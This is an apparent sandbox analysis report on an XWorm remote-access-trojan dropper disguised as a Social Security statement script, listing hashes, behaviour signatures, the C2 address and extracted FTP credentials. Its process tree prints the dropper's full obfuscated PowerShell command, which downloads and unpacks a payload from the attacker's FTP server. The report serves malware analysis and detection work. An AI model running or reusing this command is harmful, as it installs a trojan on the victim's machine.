Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Your_New_S...nt.wsf

windows7-x64

10

Your_New_S...nt.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/08/2024, 13:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Your_New_Social_Security_Statement.wsf

  • Size

    5KB

  • MD5

    3b566e8ed4838f476d7dda08a9acc1b1

  • SHA1

    a426b95ac0992dda56fa15c52a2765101df19aee

  • SHA256

    fd7d4ec1d86c01b1f234b333941e7615fae1dd342fb2ec80a4e78a5cc5fb5a42

  • SHA512

    96a460d11d28f1f3ad545b646e1b015264cd4a86aa017a6c015a52a09d5638c09439668fb397427cd24d67de062c712010f24fc82bf9b18555c9d19f2b3e5f68

  • SSDEEP

    96:TkWXrHfYiu03P/hyUMl2N6SmxV3xzjpeX0T2MNdP+lHjfmMmpR0RQVWN:o0rTuI3HM06SifzjpeEjdwQoN

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    142.44.252.6
  • Port:
    21
  • Username:
    dp
  • Password:
    pp...123456

Extracted

Family

xworm

Version

5.0

C2

OMRAN2024.WORK.GD:7001

Mutex

l4UtihZj05q6W7mB

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Your_New_Social_Security_Statement.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (( 24,77,65,62 , 43,'6c' ,69 , 65, '6e' , 74 ,20, '3d' , 20,'4e', 65 , 77 ,'2d' , '4f',62 , '6a' ,65 ,63 , 74 , 20 ,53, 79,73 ,74,65 ,'6d','2e' ,'4e' , 65 , 74, '2e' ,57, 65 , 62 ,43 , '6c', 69 ,65 , '6e' ,74 ,'3b', 20 , 24 , 77 , 65, 62,43, '6c' ,69 ,65,'6e', 74, '2e', 43 , 72 , 65 , 64 ,65, '6e', 74,69, 61,'6c' , 73, 20 ,'3d',20 , '4e' ,65,77 ,'2d', '4f' ,62, '6a' , 65 ,63, 74, 20, 53, 79,73, 74 , 65 , '6d', '2e', '4e' ,65, 74 , '2e' , '4e' , 65,74 , 77, '6f' , 72 ,'6b',43,72 ,65, 64, 65 , '6e' , 74, 69, 61, '6c',28 , 27,64, 70, 27,'2c' ,20 , 27 , 70 , 70 ,'2e', '2e' , '2e' , 31, 32, 33 ,34 , 35,36 , 27 , 29 , '3b' , 20 , 24, 77 , 65 ,62,43, '6c',69,65, '6e' ,74, '2e' , 44, '6f' ,77 ,'6e', '6c', '6f',61,64,46 , 69,'6c', 65 ,28 , 27, 66 , 74 ,70, '3a', '2f' , '2f' , 31, 34 , 32 ,'2e', 34 , 34 ,'2e', 32 , 35,32,'2e' ,36, '3a',32, 31, '2f',76 ,'2e' , '6d',70 ,34,27 ,'2c',20 , 27 ,43, '3a' , '5c',50,72 ,'6f' ,67,72, 61 ,'6d' ,44 ,61 ,74,61, '5c', '6d' ,'6f', '6f' ,'6e' , '2e', '7a',69, 70,27 ,29 , '3b', 20 ,45, 78,70,61,'6e' ,64, '2d',41,72 ,63,68 ,69,76 ,65, 20,'2d',50 , 61 ,74, 68, 20 ,27 ,43, '3a' , '5c',50, 72,'6f',67 , 72, 61 , '6d',44,61,74 ,61 , '5c','6d' ,'6f','6f','6e','2e', '7a' ,69 ,70,27,20, '2d' ,44 ,65, 73 , 74, 69, '6e', 61 , 74,69, '6f','6e',50,61, 74, 68, 20, 27 , 43 ,'3a' ,'5c' , 50, 72,'6f',67, 72 , 61 , '6d',44 ,61 , 74 , 61,'5c' ,27, '3b' , 20 , 52, 65 ,'6d' ,'6f' ,76,65 ,'2d' ,49,74,65,'6d',20 ,'2d' ,50 , 61, 74,68, 20 , 27 ,43 , '3a','5c', 50 ,72, '6f' , 67 , 72,61,'6d' ,44,61 ,74 ,61, '5c','6d' , '6f' , '6f', '6e', '2e','7a' ,69 ,70, 27,20,'2d', 46,'6f',72, 63,65 )|fOreACH-ObJECt{( [cHar] ( [cONVeRT]::TOiNT16( ( $_.TOstRIng()) ,16))) })-jOiN '' |. ( $PshOME[21]+$PsHOME[34]+'X')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3424
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Music\3DLight.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4524
      • C:\Windows\system32\cmd.exe
        cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Max3DOrganizer.ps1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Max3DOrganizer.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4576
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Max3D.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Max3D.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\system32\cmd.exe
        cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\3DMaxData.ps1"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\3DMaxData.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:4836

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Music\3DLight.bat
    Filesize

    102B

    MD5

    0680cc004900b09727ae38eab4c66907

    SHA1

    d48543546217e007e8c8865669897c9aa6300be3

    SHA256

    b62f03fd74d317e7015f289a147cc87474dc129c8ab1dc8c5c090146aa905ae2

    SHA512

    767b215ee7695788f865a0f963e8d4aa0987f93807b73a88279e6163b44dcfbe47c0589aa37f324fdf46fb54add8ca2d37ac16dac536af2877679f3e170d4747

    Download Submit

  • C:\ProgramData\Music\3DMaxData.ps1
    Filesize

    332KB

    MD5

    75ef19a035957af000068b052b3ee20e

    SHA1

    c4d3ca3b5fa178e461da6a5d78b14e8316b61a24

    SHA256

    7b5acba5ed7678ee7e2887c8b40ff22d118a3e91bdf4470c40c363341a04e7ec

    SHA512

    46817be9f5bf492a93a2125471be545d51baed4640ab838459720153a200479d57a60ce58f34f9ced33039c8c522d0a84199c63b61fa69578188e62b826f1a96

    Download Submit

  • C:\ProgramData\Music\Max3D.bat
    Filesize

    127B

    MD5

    2c620fa5ee04ac4bc35bf391fa8cc623

    SHA1

    dee6c72cfda2855ee9c71c6f9a1b9e44f925ee97

    SHA256

    0e23ac4deef989a3fcadd41c84d59a9633caaa239a19f305401b31e6e6587586

    SHA512

    9df14e39949a8ea5f3998f618065b63489661abdeeafa9f58436f7bb1cfacea7715bee65991db8ef1ad41bf3a67e372ec3d6674049b032ef04780bd7820d3542

    Download Submit

  • C:\ProgramData\Music\Max3D.vbs
    Filesize

    168B

    MD5

    0ad5eb55e2788fd7d3f7e61c9ad71998

    SHA1

    e87641dceaf096a0942698fabc7e23f8e726157a

    SHA256

    a2afc6cf9f82eee7cee38e5c700e2f1389de28694e1bf35dc376524336b7805f

    SHA512

    603c388af815886d00683e28e78f4ff930440f1dcd8a5691e5ac63fc83076be5f135523c0444726b38fc084e8b5c81ecd5510a28d1c20dff07a98ea007f30078

    Download Submit

  • C:\ProgramData\Music\Max3DOrganizer.ps1
    Filesize

    333KB

    MD5

    d84bf530e5e5b35a2edbf3169ab6e131

    SHA1

    d4f7603479cd6f3b39cd2e920a76bb4fdf6e40a5

    SHA256

    fb306c0230c9eda52e0a1294f331194c881139d36840d5e45609e25eedf6b0b6

    SHA512

    747d4319894208c3dfc1f10a220b309abdb6206df4177add550be4c6d41a47cecd88e07e7e7e4f0f0d4a9b698230675f8c0468269035be72097fb58133723866

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    fe3aab3ae544a134b68e881b82b70169

    SHA1

    926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

    SHA256

    bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

    SHA512

    3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    7ecd08d6f545ebd9ecc61025e4ff832e

    SHA1

    6ddf7b9678c441180fe3954572686ce350e976f0

    SHA256

    4cc54d576b4e7ea9849284662ac6ae643b300035651bdc744c9c27fbd9b0132d

    SHA512

    984846b970ec6d219c0c5429130f30183eb324323c7129107bca221a139afec76344714cd17978e434dbb99b8cb54f0b5fda6af48667d733a63c94a235ac1da3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    5570564a720a54d44f93052c98b2e579

    SHA1

    5ee1c8a619771b8c8842f110845e2259ab4c9df3

    SHA256

    f013225be70af66f47caa1f98e139eb0c26ba8e9a09935dba8a6a118e08312cd

    SHA512

    9a6f83ffb531a4e28c22f83f0f86749f689e90e26dab28f5b46b99290d7ec3f0c2bb3bb60123081357eecd84bcd640718c0e6e214fcd45c009aa37fa4d847fef

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5p4kxvxm.1mq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2968-62-0x0000024DA8A10000-0x0000024DA8A2A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3424-13-0x00007FFCB4E30000-0x00007FFCB58F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3424-12-0x000001BFD5860000-0x000001BFD5882000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3424-18-0x000001BFD5C30000-0x000001BFD5C3A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3424-17-0x000001BFD5C50000-0x000001BFD5C62000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3424-16-0x00007FFCB4E30000-0x00007FFCB58F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3424-14-0x00007FFCB4E30000-0x00007FFCB58F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3424-32-0x000001BFD5540000-0x000001BFD575C000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/3424-2-0x00007FFCB4E33000-0x00007FFCB4E35000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3424-33-0x00007FFCB4E30000-0x00007FFCB58F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4836-63-0x0000000000400000-0x0000000000410000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4836-65-0x0000000004F00000-0x0000000004F9C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4836-66-0x0000000005930000-0x0000000005ED4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4836-67-0x0000000005860000-0x00000000058F2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4836-68-0x0000000005820000-0x000000000582A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4836-69-0x00000000060B0000-0x0000000006116000-memory.dmp

    Filesize

    408KB

    Download